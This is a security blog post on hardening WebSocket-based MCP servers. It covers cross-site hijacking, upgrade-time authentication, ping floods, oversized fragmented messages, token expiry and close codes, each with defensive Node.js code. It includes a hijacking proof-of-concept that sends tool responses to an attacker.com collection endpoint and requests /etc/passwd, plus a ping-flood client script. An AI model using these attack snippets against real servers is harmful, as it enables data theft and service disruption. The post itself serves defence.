Security · WebSocket · Networking
MCP Server WebSocket Security: Authentication, Message Framing Attacks, and Connection Lifecycle
WebSocket-based MCP servers give up the per-request stateless model that HTTP security is built on. There is no CORS preflight to stop a cross-origin connection, no per-request auth header, and no request-scoped rate limiting. A single upgrade handshake opens a long-lived channel that stays open for hours while an LLM agent makes dozens of tool calls. Every security control needs to be redesigned for this model. This post covers the complete attack surface: cross-site WebSocket hijacking, upgrade-time authentication, message framing attacks, connection lifetime auth drift, and the close sequence.
Why WebSocket breaks the HTTP security model
Most MCP servers start as HTTP servers. Security controls like JWT validation, CORS headers, and per-request rate limiting slot naturally into middleware. The mental model is simple: each request carries credentials, each response is isolated, and the framework rejects malformed requests before they reach your handler code.
WebSocket destroys this model. The initial HTTP Upgrade request is the only HTTP request in the session — everything after that is WebSocket frames over a persistent TCP connection. This means:
- CORS does not apply to WebSocket. The browser does not send a preflight for WebSocket connections. The
Originheader is sent but the browser does not enforce any access control on the response — that is the server's job. - Cookies are sent on the upgrade request. An attacker-controlled page can open a WebSocket connection to your API using the user's cookies. The browser will not stop it.
- Authentication happens once. After the connection is established, you must maintain the auth context in server-side state. If the JWT expires, the WebSocket stays open unless you explicitly enforce a TTL.
- Rate limiting must span the connection lifetime. A single connection can send thousands of messages. Per-connection limits replace per-IP-request limits.
None of these are insurmountable — but they require intentional, WebSocket-specific security design rather than relying on middleware that works for HTTP.
Cross-site WebSocket hijacking (CSWSH)
CSWSH is the WebSocket equivalent of CSRF. An attacker hosts a page at evil.com that opens a WebSocket connection to your MCP server using the victim's browser credentials. Unlike CSRF, the attacker gets a bidirectional channel — they can read tool responses, not just trigger writes.
The attack requires no special permission from the browser:
// attacker.com/hijack.html
const ws = new WebSocket('wss://api.example.com/mcp');
ws.onmessage = (e) => {
// full access to tool responses — including file reads, search results,
// and anything the MCP server returns — exfiltrated to attacker
fetch('https://attacker.com/collect', { method: 'POST', body: e.data });
};
ws.onopen = () => {
ws.send(JSON.stringify({ method: 'tools/call', params: { name: 'read_file', arguments: { path: '/etc/passwd' } } }));
};
If your MCP server authenticates via cookies (session cookie, OAuth cookie), this request arrives with the victim's cookie and succeeds. The browser sends the cookie on the upgrade because SameSite=Lax applies to navigation and form POSTs, not to WebSocket upgrades from JavaScript.
The fix is to validate the Origin header on every upgrade request before completing the handshake:
import { WebSocketServer } from 'ws';
import { createServer } from 'http';
const ALLOWED_ORIGINS = new Set([
'https://app.example.com',
'https://claude.ai', // if you support the Claude desktop client
]);
const httpServer = createServer();
const wss = new WebSocketServer({ noServer: true });
httpServer.on('upgrade', (req, socket, head) => {
const origin = req.headers.origin;
// Block connections with no Origin header (could be a non-browser client — decide policy)
// For browser clients: always present. For CLI/server clients: absent by convention.
if (origin !== undefined && !ALLOWED_ORIGINS.has(origin)) {
socket.write('HTTP/1.1 403 Forbidden\r\n\r\n');
socket.destroy();
return;
}
// Only upgrade if Origin is acceptable
wss.handleUpgrade(req, socket, head, (ws) => {
wss.emit('connection', ws, req);
});
});
Note on same-site deployments: if your MCP server and your web app share a domain (e.g., both on example.com), Origin validation is still required — a subdomain like sub.example.com with a subdomain takeover vulnerability could initiate a WebSocket connection to api.example.com with a valid same-site origin. Use an explicit allowlist, not a domain-suffix check.
Authentication at upgrade time
The most common WebSocket authentication mistake is accepting the connection first and then waiting for the client to send credentials in the first message. This is the "authenticate-on-first-message" pattern and it has a serious problem: the connection holds a file descriptor, a memory allocation, rate limit slot, and audit log association — all before you know who the caller is.
An attacker can exhaust server connection limits without ever authenticating by opening thousands of connections and never sending the credential message. And your audit logs will show connection events with no associated identity.
The correct pattern is to authenticate during the HTTP upgrade, before calling handleUpgrade:
import jwt from 'jsonwebtoken';
httpServer.on('upgrade', (req, socket, head) => {
// Origin check first (CSWSH)
const origin = req.headers.origin;
if (origin !== undefined && !ALLOWED_ORIGINS.has(origin)) {
socket.write('HTTP/1.1 403 Forbidden\r\n\r\n');
socket.destroy();
return;
}
// Extract token from Authorization header
// WebSocket clients can set custom headers (ws library: { headers: { Authorization: 'Bearer ...' } })
// Browser WebSocket API cannot set custom headers — use Sec-WebSocket-Protocol trick or query param
const authHeader = req.headers['authorization'];
if (!authHeader || !authHeader.startsWith('Bearer ')) {
socket.write('HTTP/1.1 401 Unauthorized\r\nWWW-Authenticate: Bearer\r\n\r\n');
socket.destroy();
return;
}
let claims;
try {
claims = jwt.verify(authHeader.slice(7), process.env.JWT_SECRET);
} catch {
socket.write('HTTP/1.1 401 Unauthorized\r\n\r\n');
socket.destroy();
return;
}
// Authentication passed — upgrade and attach claims to the ws object
wss.handleUpgrade(req, socket, head, (ws) => {
ws.authContext = {
userId: claims.sub,
scopes: claims.scopes ?? [],
tokenExp: claims.exp,
connectedAt: Date.now(),
};
wss.emit('connection', ws, req);
});
});
Browser clients: the browser WebSocket API cannot set custom HTTP headers on the upgrade request. The common workarounds are: (1) send the token as a Sec-WebSocket-Protocol sub-protocol value (misuse of the header, but works in practice), or (2) use a short-lived one-time token in the query string — generate it server-side after full OAuth, pass it in the URL, invalidate it immediately after the WebSocket connects. Never put long-lived tokens in URLs (they appear in server logs and browser history).
Message framing attacks
WebSocket uses a binary frame format defined in RFC 6455. Each frame has an opcode (text, binary, continuation, ping, pong, close), a FIN bit indicating whether this is the last fragment, a masking bit, and a payload. Understanding this framing is necessary to understand the attack surface.
Ping flood — exhausting event loop capacity
RFC 6455 §5.5.3 requires that a WebSocket endpoint reply to every Ping frame with a corresponding Pong frame. The ws library auto-responds to pings with no rate limiting — every ping triggers a pong regardless of how many pings arrive per second.
An attacker who has established a WebSocket connection (even an unauthenticated one on a server that doesn't enforce upgrade-time auth) can send thousands of Ping control frames per second. Since control frames cannot be fragmented (RFC 6455 §5.5), each ping must be processed individually. The ws library emits a ping event and auto-sends a pong synchronously in the event loop, blocking it from processing data frames.
// Ping flood from attacker — sends raw WebSocket ping frames
// (cannot be demonstrated with the browser WebSocket API — only with ws library or raw TCP)
const WebSocket = require('ws');
const ws = new WebSocket('wss://target.example.com/mcp');
ws.on('open', () => {
// Send 1000 ping frames per second
setInterval(() => {
for (let i = 0; i < 100; i++) {
ws.ping();
}
}, 100);
});
// SERVER FIX: disable auto-ping-response and rate-limit manual pong sending
const wss = new WebSocketServer({ noServer: true });
wss.on('connection', (ws) => {
let pingCount = 0;
let pingWindowStart = Date.now();
const MAX_PINGS_PER_MINUTE = 60;
// Remove auto-pong: ws library doesn't expose a way to disable it directly,
// but you can track and close on flood
ws.on('ping', () => {
const now = Date.now();
if (now - pingWindowStart > 60_000) {
pingCount = 0;
pingWindowStart = now;
}
pingCount++;
if (pingCount > MAX_PINGS_PER_MINUTE) {
ws.close(1008, 'Ping rate limit exceeded');
}
});
});
Message fragmentation — bypassing per-message size limits
WebSocket messages can be split across multiple frames using the FIN bit. Intermediate frames have FIN=0; the final frame has FIN=1. The ws library reassembles fragmented messages before emitting the message event — meaning your message handler always sees the fully assembled payload, not individual frames.
This matters for size limits. If you enforce a size limit on the raw message data in the message event callback, you are checking the assembled size — which is correct. But you need to also set the maxPayload option on the WebSocketServer, because the ws library applies this limit during reassembly, before emitting the event. Without it, the library uses a default of 100 MB — enough to exhaust memory before your handler code even runs.
// UNSAFE: default maxPayload is 100 MB — fragmented messages are assembled in memory
const wss = new WebSocketServer({ port: 8080 });
// SAFE: set maxPayload to a sane limit — 1 MB is generous for tool calls
// ws library will close the connection with code 1009 if reassembled size exceeds this
const wss = new WebSocketServer({
noServer: true,
maxPayload: 1 * 1024 * 1024, // 1 MB
});
// Additional schema-level limit in the message handler
wss.on('connection', (ws) => {
ws.on('message', (data) => {
// data is already assembled (ws handles fragmentation)
if (data.length > 512 * 1024) { // extra 512 KB limit on top of maxPayload
ws.close(1009, 'Message too large');
return;
}
handleMcpMessage(ws, JSON.parse(data.toString()));
});
});
Unmasked client frames — proxy desync
RFC 6455 §5.3 requires all frames sent by a client to be masked with a 4-byte masking key. Servers must reject connections that send unmasked frames. Servers must NOT mask frames they send to clients. This asymmetry exists to prevent cache poisoning attacks against intercepting proxies.
The attack vector: a poorly implemented reverse proxy or WebSocket interceptor that fails to properly pass through masking can cause frame desynchronization. The server receives what appears to be a valid frame opcode, but the payload bytes have been XOR'd with the wrong masking key — corrupting tool call parameters or, in worst cases, causing the server to interpret a data frame as a control frame.
The ws library handles masking validation correctly when operating as a server. The risk is in custom WebSocket implementations or in proxy configurations that terminate WebSocket and re-proxy without proper frame handling. Audit any middleware that touches WebSocket frames between the client and your MCP server handler.
// ws library validates masking automatically — you don't need to check this yourself
// BUT: verify your reverse proxy does not re-proxy WebSocket at the HTTP level
// Nginx: use proxy_pass with Upgrade + Connection headers for true WebSocket passthrough
// location /mcp {
// proxy_pass http://localhost:3000;
// proxy_http_version 1.1;
// proxy_set_header Upgrade $http_upgrade;
// proxy_set_header Connection "upgrade";
// // these ensure nginx passes the WebSocket connection through, not HTTP
// }
Connection lifetime and auth drift
An LLM agent session can last hours. A JWT with a 1-hour expiry is issued at upgrade time. Forty-five minutes into the session, the agent is still making tool calls — with a token that expires in 15 minutes. At minute 61, the JWT is expired but the WebSocket connection is still open and the agent is still authenticated, because WebSocket authentication is checked once at upgrade.
This is auth drift: the credential that established the session has expired, but the session lives on. For short-lived tokens (JWTs, OAuth access tokens), this creates a window where a revoked or expired token continues to authorize tool calls.
The solution has two parts: a server-enforced connection TTL, and periodic token validation.
const CONNECTION_TTL_MS = 4 * 60 * 60 * 1000; // 4 hours max per connection
const TOKEN_RECHECK_INTERVAL_MS = 15 * 60 * 1000; // recheck token every 15 min
wss.on('connection', (ws, req) => {
const auth = ws.authContext;
// Enforce absolute connection TTL
const connTtlTimer = setTimeout(() => {
ws.close(1001, 'Connection TTL exceeded');
}, CONNECTION_TTL_MS);
// Periodic token expiry check — catches revoked/expired JWTs
const recheckTimer = setInterval(() => {
const nowSec = Math.floor(Date.now() / 1000);
if (auth.tokenExp && auth.tokenExp < nowSec) {
ws.close(4001, 'Token expired — reconnect with fresh credentials');
return;
}
// Optional: ping a token revocation endpoint or Redis revocation set
checkRevocation(auth.userId).then(isRevoked => {
if (isRevoked) ws.close(4002, 'Token revoked');
});
}, TOKEN_RECHECK_INTERVAL_MS);
ws.on('close', () => {
clearTimeout(connTtlTimer);
clearInterval(recheckTimer);
});
ws.on('message', async (data) => {
// Per-message: check token hasn't expired since last message
const nowSec = Math.floor(Date.now() / 1000);
if (auth.tokenExp && auth.tokenExp < nowSec) {
ws.send(JSON.stringify({ error: 'token_expired', message: 'Reconnect with a fresh token' }));
ws.close(4001, 'Token expired');
return;
}
await handleMcpMessage(ws, data);
});
});
For long-lived agent sessions, consider adding a token refresh message type to your MCP protocol extension — the client sends a auth/refresh message with a new token, the server validates it and updates ws.authContext.tokenExp, extending the effective session without requiring a full reconnect and re-auth.
Rate limiting across reconnects
Per-connection rate limits are easy to bypass by reconnecting. An attacker who wants to make 10,000 tool calls per minute can open and close 100 connections per minute, staying under the per-connection limit on each one. Effective rate limiting for WebSocket MCP servers must be tracked per-identity (user ID from the JWT), not per-connection.
import { RateLimiter } from 'your-rate-limiter';
// Per-user rate limiters — shared across all connections from the same user
const callLimiters = new Map(); // userId → RateLimiter
function getCallLimiter(userId) {
if (!callLimiters.has(userId)) {
callLimiters.set(userId, new RateLimiter({
maxRequests: 200, // 200 tool calls per minute per user
windowMs: 60_000,
}));
}
return callLimiters.get(userId);
}
// Connection-level rate limiting for upgrade requests — prevent reconnect flooding
const upgradeLimiter = new Map(); // IP → { count, windowStart }
const MAX_UPGRADES_PER_MINUTE_PER_IP = 10;
httpServer.on('upgrade', (req, socket, head) => {
const ip = req.socket.remoteAddress;
const now = Date.now();
const entry = upgradeLimiter.get(ip) ?? { count: 0, windowStart: now };
if (now - entry.windowStart > 60_000) {
entry.count = 0;
entry.windowStart = now;
}
entry.count++;
upgradeLimiter.set(ip, entry);
if (entry.count > MAX_UPGRADES_PER_MINUTE_PER_IP) {
socket.write('HTTP/1.1 429 Too Many Requests\r\n\r\n');
socket.destroy();
return;
}
// ... rest of upgrade handling
});
Secure close sequences
WebSocket close frames carry a 2-byte close code and an optional UTF-8 reason string (max 125 bytes). The reason string is sent in plaintext to the client. Do not include error messages, stack traces, user IDs, internal service names, or database error details in the close reason — they are directly visible to the caller.
// UNSAFE: leaks internal error details
ws.close(1011, `Database error: ${dbError.message} (table: users, query: ${sql})`);
// SAFE: client gets a code they can act on, details go to your structured log
logger.error({ event: 'ws_close_error', userId: ws.authContext?.userId, err: dbError });
ws.close(1011, 'Internal error — request ID: ' + requestId); // requestId for correlation only
// Standard close codes (RFC 6455):
// 1000 — normal closure
// 1001 — going away (server restart)
// 1002 — protocol error
// 1003 — unsupported data type
// 1008 — policy violation (auth, rate limit)
// 1009 — message too large
// 1011 — unexpected condition (server error)
// 4000–4999 — application-defined (safe to use)
// Application codes for MCP servers:
// 4001 — token expired (client should reconnect with a fresh token)
// 4002 — token revoked (client should reauth at the OAuth server)
// 4003 — scope insufficient (client requested a tool they don't have permission for)
// 4004 — session limit exceeded (user has too many concurrent connections)
Always send a Close frame rather than abruptly destroying the socket. Abrupt closes (socket destroy without a WebSocket close frame) leave the client unable to distinguish between a server error and a network interruption. Well-coded MCP clients use the close code to decide whether to retry, re-authenticate, or surface an error to the user.
Complete security checklist for WebSocket MCP servers
Upgrade handler: Origin validation
Check req.headers.origin against an explicit allowlist of known origins before calling wss.handleUpgrade(). Never use a suffix check — use a full URL match.
Upgrade handler: authenticate before upgrade
Validate JWT or session token during the HTTP upgrade request. Reject unauthenticated connections with 401 before the WebSocket connection is established. Attach auth context (userId, scopes, tokenExp) to the ws object.
WebSocketServer options: maxPayload
Set maxPayload to 1 MB or less. The default is 100 MB — a single fragmented message can exhaust server memory before any handler code runs.
Connection handler: ping rate limiting
Track ping count per connection. Close with code 1008 if ping rate exceeds threshold (e.g., 60 pings/minute). The ws library auto-responds to pings — you cannot disable this, only detect and close.
Connection handler: connection TTL and token expiry check
Set a hard connection TTL (e.g., 4 hours) with setTimeout. Check ws.authContext.tokenExp on each message and periodically via setInterval. Close with code 4001 on token expiry.
Rate limiting: per-identity across connections
Track tool call rate per user ID, not per connection. Track upgrade request rate per IP. Reconnect cycling is the primary bypass for per-connection limits.
Close: send Close frames, not destroy()
Always close with ws.close(code, reason). Use application codes 4001–4004 for auth/session events. Do not include error details in the reason string — log them to your structured logger instead.
SkillAudit findings for WebSocket MCP servers
maxPayload option set on the WebSocketServer. Fragmented messages can be assembled in-memory up to 100 MB before the message handler fires. Grade impact: −10.
Related: Rate limiting deep dive · Authorization models compared · WebSocket message framing security reference